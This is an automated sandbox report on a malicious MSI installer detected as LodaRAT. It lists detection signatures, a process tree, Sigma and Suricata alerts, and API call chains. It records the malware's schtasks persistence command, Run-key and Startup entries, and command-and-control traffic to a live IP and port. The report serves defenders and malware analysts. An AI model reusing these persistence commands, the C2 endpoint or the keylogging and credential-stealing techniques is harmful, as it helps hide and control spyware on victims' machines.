
Windows Analysis Report
test.msi

Overview

General Information

Sample name: test.msi
Analysis ID: 1582344
MD5: 9e62c7a7caada70e0cd988510e2e0838
SHA1: 3b2884a46ae25e424805879bd8f2e1e970c54272
SHA256: e397394a06441c8893d91907b6e7dd02bb1e5243d26697feb924b24bb2984647
Tags: knkbkk212msiuser-JAMESWT_MHT

Detection

LodaRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
AI detected suspicious sample
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • msiexec.exe (PID: 4928 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\test.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3640 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • MSI77F6.tmp (PID: 3192 cmdline: "C:\Windows\Installer\MSI77F6.tmp" MD5: 13AF887E6C39E427715E769CC334C83E)
      • cmd.exe (PID: 6704 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 2836 cmdline: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 2732 cmdline: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • ELJQZX.exe (PID: 6416 cmdline: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 6516 cmdline: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe" MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe" MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 1268 cmdline: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe" MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 6224 cmdline: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe MD5: 13AF887E6C39E427715E769CC334C83E)
  • ELJQZX.exe (PID: 3136 cmdline: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe MD5: 13AF887E6C39E427715E769CC334C83E)
  • cleanup
Name: Loda, LodaRAT
Description: Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.loda
No configs have been found
Source | Rule | Description | Author
dump.pcap | JoeSecurity_LodaRat_1 | Yara detected LodaRAT | Joe Security
C:\Users\user\AppData\Local\Temp\PAITNR.vbs | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000006.00000002.3415165237.0000000003288000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000003.00000002.3418899166.0000000004D99000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000006.00000002.3414950251.00000000031D0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
00000006.00000002.3415165237.00000000032B5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security
Process Memory Space: MSI77F6.tmp PID: 3192 | JoeSecurity_ProcessChecker | Yara detected ProcessChecker | Joe Security

                System Summary

Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Windows\Installer\MSI77F6.tmp, Initiated: true, ProcessId: 3192, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49762
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe
Source: Process started | Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community | Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, ProcessId: 6704, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Installer\MSI77F6.tmp, ProcessId: 3192, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PAITNR
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Windows\Installer\MSI77F6.tmp, ProcessId: 3192, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAITNR.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6704, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1, ProcessId: 2836, ProcessName: schtasks.exe
Source: Process started | Author: Michael Haag | Data: Command: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI77F6.tmp", ParentImage: C:\Windows\Installer\MSI77F6.tmp, ParentProcessId: 3192, ParentProcessName: MSI77F6.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs, ProcessId: 2732, ProcessName: wscript.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:37:25.586902+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.6 | 49988 | TCP
2024-12-30T11:38:03.633679+0100 | 2830912 | 1 | Malware Command and Control Activity Detected | 172.111.138.100 | 5552 | 192.168.2.6 | 49988 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T11:36:12.325655+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49762 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:12.325655+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49885 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:12.325655+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:12.325655+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49949 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:12.325655+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49988 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:12.325655+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49826 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:28.508339+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49762 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:37.554770+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49826 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:46.800558+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49885 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:36:55.862538+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49949 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:37:04.956730+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49986 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:37:14.034642+0100 | 2849885 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49988 | 172.111.138.100 | 5552 | TCP


                AV Detection

Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Virustotal: Detection: 52%
Source: C:\Windows\Installer\MSI77F6.tmp | ReversingLabs: Detection: 87%
Source: C:\Windows\Installer\MSI77F6.tmp | Virustotal: Detection: 52%
Source: test.msi | ReversingLabs: Detection: 57%
Source: test.msi | Virustotal: Detection: 61%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 91.3% probability
Source: C:\Windows\Installer\MSI77F6.tmp | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0078DD92 GetFileAttributesW,FindFirstFileW,FindClose,3_2_0078DD92
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C2044
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_007C219F
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007C24A9
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_007B6B3F
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_007B6E4A
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_007BF350
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007BFD47 FindFirstFileW,FindClose,3_2_007BFD47
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_007BFDD2
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002D2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D2044
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002D219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_002D219F
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002D24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002D24A9
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002C6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_002C6B3F
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002C6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_002C6E4A
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002CF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_002CF350
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002CFD47 FindFirstFileW,FindClose,8_2_002CFD47
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_0029DD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_0029DD92
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002CFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_002CFDD2

                Networking

Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49826 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49762 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49885 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49949 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49988 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49986 -> 172.111.138.100:5552
Source: Network traffic | Suricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.6:49988
Source: Joe Sandbox View | IP Address: 172.111.138.100
Source: Joe Sandbox View | ASN Name: VOXILITYGB
Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100 (30 occurrences)
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,3_2_007C550C
Source: MSI77F6.tmp, 00000003.00000002.3415544597.000000000179F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ip-score.com/checkip/6;
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_007C7099
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_007C7294
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002D7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_002D7294
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007C7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_007C7099
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007B4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,3_2_007B4342
Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_007DF5D0
Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002EF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,8_2_002EF5D0

                System Summary

                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007E02AA NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DE769 NtdllDialogWndProc_W,CallWindowProcW
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DEA4E NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DEAA6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0078AC99 NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0078AD5C NtdllDialogWndProc_W,74A3C8D0,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_0078AFB4 GetParent,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF0A1 SendMessageW,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF37C NtdllDialogWndProc_W
                Source: C:\Windows\Installer\MSI77F6.tmp Code function: 3_2_007DF3DA NtdllDialogWndProc_W
